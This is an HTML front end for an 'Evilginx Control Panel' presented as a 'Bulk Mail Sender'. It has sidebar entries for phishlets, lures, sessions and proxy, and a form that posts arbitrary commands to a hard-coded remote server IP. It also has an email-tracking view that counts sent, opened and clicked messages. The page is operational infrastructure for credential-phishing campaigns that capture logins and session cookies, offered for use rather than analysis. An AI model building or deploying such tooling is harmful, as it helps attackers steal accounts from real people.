<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Bulk Mail Sender</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"
    integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g=="
    crossorigin="anonymous" referrerpolicy="no-referrer" />
  <link rel="stylesheet" type="text/css" href="style.css">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" />
</head>

<body class="black">

  <div class="sidebar">
    <a href="#" onclick="showContent('home')">Config</a>
    <a href="#" onclick="showContent('trackingemail')">Phishlets</a>
    <a href="#" onclick="showContent('emailStatus')">Lures</a>
    <a href="#" onclick="showContent('setting')">Sessions</a>
    <a href="#" onclick="showContent('setting')">Blacklist</a>
    <a href="#" onclick="showContent('setting')">Proxy</a>
    <a href="#" onclick="showContent('setting')">Clear</a>
    <a href="#" onclick="showContent('setting')">Test-Certs</a>
    <a href="#" onclick="showContent('setting')">Help</a>

    <a href="#">Logout</a>
  </div>

  <div class="content">


    <!-- <nav class="navbar navbar-expand-lg navbar-dark bg-dark mb-4">
      <div class="container-fluid">
        <a class="navbar-brand">Bulk Mail Sender</a>
        <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav"
          aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
          <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarNav">
          <ul class="navbar-nav ms-auto">
            <li class="nav-item">
              <a class="nav-link active" aria-current="page" href="#" onclick="showContent('home')">Home</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="#" onclick="showContent('trackingemail')">Tracking</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="#" onclick="showContent('emailStatus')">Tracking2</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="#" onclick="showContent('setting')">Settings</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="#">Logout</a>
            </li>
          </ul>
        </div>
      </div>
    </nav> -->

    <div id="homeContent" style="display: block">

      <h1>Evilginx Control Panel</h1><br>
      <!-- <b>Command List:</b> -->
      <!-- <b>sessions lures blacklist test-certs clear config proxy phishlets help</b><br /><br /> -->
      <form action="http://137.184.15.95:8080/" method="post">
        <input type="text" name="command" placeholder="Enter command" />
        <input type="submit" name="submit_command" value="Execute Command" />

        <input type="text" name="set_domain" placeholder="Set Domain" />
        <input type="submit" name="submit_domain" value="Set Domain" />
      </form>
      <div class="output" style="margin-top: 20px">
      </div>
    </div>

    <div id="emailStatus" style="display: none">

      <h1>Evilginx Control Panel</h1>
      <!-- <b>Command List:</b> -->
      <!-- <b>sessions lures blacklist test-certs clear config proxy phishlets help</b><br /><br /> -->
      <form method="post">
        <input type="text" name="command" placeholder="Enter command" />
        <input type="submit" name="submit_command" value="Execute Command" />

        <input type="text" name="set_domain" placeholder="Set Domain" />
        <input type="submit" name="submit_domain" value="Set Domain" />
      </form>
      <div class="output" style="margin-top: 20px">
      </div>
    </div>

    <div id="trackingemail" style="display: none; color: #ffffff !important">
      <h2>Email Status</h2>
      <div class="alert alert-success">
        <strong>Total Successful Emails Sent:</strong>
        <span id="total-successful">0</span>
      </div>
      <div class="alert alert-danger">
        <strong>Total Failed Emails:</strong> <span id="total-failed">0</span>
      </div>
      <h3>Successful Emails</h3>
      <table id="successful-emails">
        <thead>
          <tr>
            <th>Date</th>
            <th>Email</th>
            <th>Status</th>
            <th>Open</th>
            <th>Click</th>
          </tr>
        </thead>
        <tbody>
          <!-- Data will be inserted here -->
        </tbody>
      </table>
      <h3>Failed Emails</h3>
      <table id="failed-emails">
        <thead>
          <tr>
            <th>Email</th>
            <th>Status</th>
          </tr>
        </thead>
        <tbody>
          <!-- Data will be inserted here -->
        </tbody>
      </table>
    </div>

    <div id="settingContent" style="display: none">
      <h2 class="text-center fw-bold mb-4">Settings</h2>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js"></script>

  <script>
    function showContent(contentId) {
      const homeContent = document.getElementById("homeContent");
      const emailStatus = document.getElementById("emailStatus");
      const trackingemail = document.getElementById("trackingemail");
      const settingContent = document.getElementById("settingContent");

      if (!homeContent || !emailStatus || !settingContent || !trackingemail) {
        console.error("One or more content sections are missing.");
        return;
      }

      homeContent.style.display = "none";
      emailStatus.style.display = "none";
      trackingemail.style.display = "none";
      settingContent.style.display = "none";

      if (contentId === "home") {
        homeContent.style.display = "block";
      } else if (contentId === "emailStatus") {
        emailStatus.style.display = "block";
        // fetchEmailStatus();
      } else if (contentId === "trackingemail") {
        trackingemail.style.display = "block";
      } else if (contentId === "setting") {
        settingContent.style.display = "block";
      } else {
        console.error("Invalid content ID.");
      }

      const selectedContent = document.getElementById(contentId + "Content");
      if (selectedContent) {
        selectedContent.style.display = "block";
      } else {
        console.error("Selected content section is missing.");
      }
    }
  </script>

  <script src="jquery@3.6.0.min.js"></script>
</body>
</html>